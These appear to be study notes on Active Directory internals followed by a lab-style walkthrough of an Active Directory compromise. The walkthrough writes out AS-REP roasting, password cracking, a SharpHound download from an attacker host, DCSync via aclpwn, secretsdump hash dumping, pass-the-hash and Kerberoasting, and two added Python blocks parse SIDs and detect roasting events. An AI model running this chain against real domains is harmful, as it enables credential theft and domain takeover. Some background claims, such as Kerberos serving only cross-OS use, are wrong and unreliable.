Active Directory
SID: Security Identifier. Every security principal in AD is assigned a SID. A security principal is a user or object that can have security permissions assigned to it for resource access. RID: Relative ID. This is the last component of the SID, and it identifies the particular user or group account.

The parts of a SID string, in order:
- Indicates it is a SID string.
- The revision of the SID structure. Windows NT and later starts with 1.
- Identifier Authority. 5 = NT Authority.
- Domain identifier.
- RID. Identifies the particular account or group.
RIDs below 1000 are reserved/special accounts. Important RIDs: 500 (Administrator account), 512 (Domain Admins group).

Forests: Clusters of domains that use "Trusts" between them, so one security principal in domain A can request and access information from domain B. In a corporate environment there is a legitimate need for this. There can also be multi-forest setups that have trusts between them.

NTLM (Msv1_0.dll): Dependent on the Net Logon service. Does client authentication and authorization. NTLM utilizes trusts and is used when Kerberos is not available.

Kerberos (Kerberos.dll): Connects the KDC (Key Distribution Center) and Active Directory for the Ticket Granting Service (TGS). This is used only for cross operating system permission interactions, like between Windows and Linux.

Net Logon (Netlogon.dll): The AD authentication secure channel protocol. It is used when trusts are being set up or managed, during authentication, for DC location, and for pass-through validation:
- Trust setup and management – Net Logon helps maintain trust passwords, gathers trust information and verifies trusts by interacting with the LSA process and the TDO. For forest trusts, the trust information includes the Forest Trust Information (FTInfo) record, which includes the set of namespaces that a trusted forest claims to manage, annotated with a field that indicates whether each claim is actually trusted by the trusting forest.
- Authentication – Supplies user credentials over a secured channel to a domain controller and returns the domain SIDs and user rights for the user.
- Domain controller location – Helps with finding or locating domain controllers in a domain or across domains.
- Pass-through validation – Credentials of users in other domains are processed by Net Logon. When a trusting domain needs to verify the identity of a user, it passes the user's credentials through Net Logon to the trusted domain for verification.
- Privilege Attribute Certificate (PAC) verification – When a server using the Kerberos protocol for authentication needs to verify the PAC in a service ticket, it sends the PAC across the secure channel to its domain controller for verification.

LSA (Lsasrv.dll): Local Security Authority. Maintains local security policies and works in both kernel mode and user mode to validate user access to objects.

TDO (Trusted Domain Object): The container that is created for every trust that is established. The trust object contains different information depending on whether it is for a forest trust or a domain trust. The more of these are set up, the slower access will be. New DCs limit this to 2400 trusts. The trust link can also not be longer than 10 trusts to get to the object.
- 1-way vs 2-way: trusts can be bidirectional or single-direction relationships; for a 1-way trust only A can request information from B, not the other way. All forests are 2-way, but domains can have either.
- Transitive vs non-transitive: a non-transitive trust is an explicit trust between domains that cannot be inherited.
- pickup:
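As an added example in Python (not part of these notes), the SID layout described above is parsed out of a SID string and checked against the reserved range and the important RIDs the notes list. The domain sub-authority values used in the usage block are constructed, and the authority and RID tables hold only the values given on this page.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# Values taken from the notes: identifier authority 5 is NT Authority; RIDs below 1000
# are reserved, and 500 (Administrator) and 512 (Domain Admins) are the ones to watch.
IDENTIFIER_AUTHORITIES = {5: "NT Authority"}
IMPORTANT_RIDS = {500: "Administrator", 512: "Domain Admins"}
RESERVED_RID_CEILING = 1000

# "S" marker, revision, identifier authority, then one or more dash-separated sub-authorities.
SID_RE = re.compile(r"^S-(\d+)-(\d+)((?:-\d+)+)$")


@dataclass(frozen=True)
class ParsedSid:
    revision: int
    identifier_authority: int
    authority_name: Optional[str]
    domain_identifier: Tuple[int, ...]  # sub-authorities between the authority and the RID
    rid: int

    @property
    def reserved(self) -> bool:
        """RIDs below 1000 belong to built-in/special accounts."""
        return self.rid < RESERVED_RID_CEILING

    @property
    def label(self) -> Optional[str]:
        """Name of the account/group if the RID is one the notes call important."""
        return IMPORTANT_RIDS.get(self.rid)


def is_sid_string(text: str) -> bool:
    return SID_RE.match(text.strip()) is not None


def parse_sid(sid: str) -> ParsedSid:
    """Split a SID string into revision, authority, domain identifier and RID."""
    m = SID_RE.match(sid.strip())
    if not m:
        raise ValueError(f"not a SID string: {sid!r}")
    revision = int(m.group(1))
    if revision != 1:
        raise ValueError(f"unexpected SID revision {revision} (Windows NT and later use 1)")
    authority = int(m.group(2))
    sub_authorities = tuple(int(x) for x in m.group(3).split("-")[1:])
    return ParsedSid(
        revision=revision,
        identifier_authority=authority,
        authority_name=IDENTIFIER_AUTHORITIES.get(authority),
        domain_identifier=sub_authorities[:-1],
        rid=sub_authorities[-1],
    )


def same_domain(a: ParsedSid, b: ParsedSid) -> bool:
    """Two principals share a domain when everything before the RID matches."""
    return (a.identifier_authority, a.domain_identifier) == (b.identifier_authority, b.domain_identifier)


def privileged_sids(sids: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (sid, label) for every SID whose RID is an important built-in one."""
    hits = []
    for s in sids:
        parsed = parse_sid(s)
        if parsed.label:
            hits.append((s, parsed.label))
    return hits


if __name__ == "__main__":
    # Constructed domain identifiers; the RIDs are the well-known ones from the notes.
    sample = [
        "S-1-5-21-111111111-222222222-333333333-500",
        "S-1-5-21-111111111-222222222-333333333-1105",
        "S-1-5-21-444444444-555555555-666666666-512",
    ]
    for s in sample:
        p = parse_sid(s)
        print(s, "->", p.authority_name, "domain", p.domain_identifier, "rid", p.rid,
              "reserved" if p.reserved else "normal", p.label or "")
    print("privileged:", privileged_sids(sample))
```

Feeding a list of SIDs pulled from group memberships or ACLs through privileged_sids is a quick way to spot where the RID-500 and RID-512 principals show up; same_domain separates those hits by domain, which matters once trusts are involved.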
AD hacking assistance PS scripts:
- PentestWS for notes
- Responder
- NTLMrelayx vs SMBrelay
- MITM6
- ldapdomaindump
- aclpwn.py
-----Foothold-----

Method 1: (rpc: user grab -> GetNPUsers.py: grab pre-auth hash -> john: crack -> evil-winrm: login)
- Get user name (rpc null auth, enumdomusers)
- Harvest non-preauth AS_REP responses
#python GetNPUsers.py -no-pass -k -dc-ip <ip> <domain/user>
#python GetNPUsers.py -no-pass -k -dc-ip 10.10.10.10 htb.local/svc-alfresco //will return a hash if it worked
- Save the hash to a file, hash.hash
- Cracking (with john)
#john -w:/usr/share/wordlists/rockyou.txt hash.hash
- Next use evil-winrm to log in with the creds we have
#evil-winrm -i 10.10.10.10 -u svc-alfresco -p s3rvice

Method 2: (Already obtained a user:pass by some method like nfs, smb, etc. -> query for AD user info)
#GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/svc_tgs //enter password on request
- Next use evil-winrm to log in with the creds we have
#evil-winrm -i 10.10.10.10 -u svc_tgs -p somepass

-----Privesc-----

Method 1: (SharpHound collection on victim -> we see Exchange and go for Exchange vulns -> DCSync -> secretsdump: request all hashes -> evil-winrm: login with admin hash)
- Install and start BloodHound (separate video)
- Move SharpHound.ps1 to the victim. Host it with HTTP, then use the PS cmd below to copy it.
PS> iwr http://10.10.14.15/SharpHound.ps1 -outf .\Sharphound.ps1
- Then run the AD collection script
PS> Invoke-Bloodhound -CollectionMethod All -LDAPPort 389 -LDAPUser svc-alfresco -LDAPPass s3rvice
- We should now see that we have a bloodhound.zip file. We need to send that back to the Kali box and drag and drop it into the BloodHound GUI.
- After the files have been processed open Queries -> Find shortest path to DAs
- Then after we click the domain admin pop-up we have this graphic:
- We then decided to abuse DCSync when we see Exchange is set up. First we add ourselves as a user.
#aclpwn --domain htb.local -d htb.local -du neo4j -dp mypass -f svc-alfresco -u svc-alfresco -p s3rvice -s 10.10.10.10
If it worked we should see:
Then we run secretsdump to get the admin hash
#secretsdump.py htb.local/svc-alfresco:s3rvice@10.10.10.10
And login:
#evil-winrm -i 10.10.10.10 -u Administrator -H <hash>

Method 2: On HTB Active, when we use the BloodHound drop-down queries we see that the admin user is kerberoastable:
Which returns an infographic showing us it's roastable. So we run:
#GetUserSPNs.py -request -dc-ip 10.10.10.10 active.htb/svc_tgs //then enter password and we should get the hash
//once we crack the password we can try psexec.py to the box to get system.
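Both ticket-based steps above (the AS-REP harvest in Foothold Method 1 and the SPN request in Privesc Method 2) leave a trace on the domain controller, so here is an added Python example, written for the detection side and not part of these notes, that scans Kerberos audit records for the two patterns: a TGT issued to an account without pre-authentication (event 4768, pre-auth type 0) and an RC4 service ticket for a user-account SPN (event 4769, encryption type 0x17). The records are constructed, simplified key=value lines using the field names of those two events, not real Windows log text; the account names and 10.10.x.x addresses are the ones from the notes.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: one event per line as key=value pairs (not real Security-log text).
SAMPLE_EVENTS = """\
EventID=4768 TargetUserName=svc-alfresco PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.15 Status=0x0
EventID=4768 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.10.50 Status=0x0
EventID=4769 TargetUserName=svc_tgs@ACTIVE.HTB ServiceName=svc_tgs TicketEncryptionType=0x17 IpAddress=10.10.14.15 Status=0x0
EventID=4769 TargetUserName=bob@ACTIVE.HTB ServiceName=WS01$ TicketEncryptionType=0x17 IpAddress=10.10.10.51 Status=0x0
EventID=4769 TargetUserName=bob@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=10.10.10.51 Status=0x0
"""

RC4_HMAC = 0x17   # etype 23: the ticket is keyed with the account's NT hash, which is what gets cracked offline
NO_PREAUTH = 0    # 4768 Pre-Authentication Type 0: the TGT was handed out without pre-auth

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> Dict[str, str]:
    """Turn one key=value record into a dict."""
    return dict(KV_RE.findall(line))


def classify(ev: Dict[str, str]) -> Optional[str]:
    """Return a finding string if the event matches one of the two roasting patterns."""
    if ev.get("Status") != "0x0":
        return None  # a failed request hands out nothing crackable
    etype = int(ev.get("TicketEncryptionType", "0x0"), 16)
    if ev.get("EventID") == "4768":
        if int(ev.get("PreAuthType", "-1")) == NO_PREAUTH:
            return f"AS-REP roasting candidate: TGT issued without pre-auth (etype {etype:#x})"
    elif ev.get("EventID") == "4769":
        service = ev.get("ServiceName", "")
        # krbtgt and machine accounts (trailing $) have long random keys; flag only user-account SPNs
        if etype == RC4_HMAC and service.lower() != "krbtgt" and not service.endswith("$"):
            return "Kerberoasting candidate: RC4 service ticket for a user-account SPN"
    return None


def scan(text: str) -> List[Dict[str, str]]:
    """Run classify over every record and collect the hits with the account and requesting IP."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        reason = classify(ev)
        if reason is None:
            continue
        account = ev["TargetUserName"] if ev["EventID"] == "4768" else ev["ServiceName"]
        findings.append({"event": ev["EventID"], "account": account,
                         "source": ev.get("IpAddress", "?"), "reason": reason})
    return findings


def sources_by_hits(findings: List[Dict[str, str]]) -> Dict[str, int]:
    """Count findings per requesting address; one host tripping both rules is worth a look."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f["source"]] = counts.get(f["source"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS)
    for h in hits:
        print(h)
    print(sources_by_hits(hits))
```

The two findings the sample produces both point at 10.10.14.15, which is the kind of clustering that turns two low-signal events into one alert. On the prevention side the same fields tell you what to fix: accounts showing pre-auth type 0 should have "Do not require Kerberos preauthentication" cleared, and service accounts still issuing 0x17 tickets should be moved to AES with a long, rotated password.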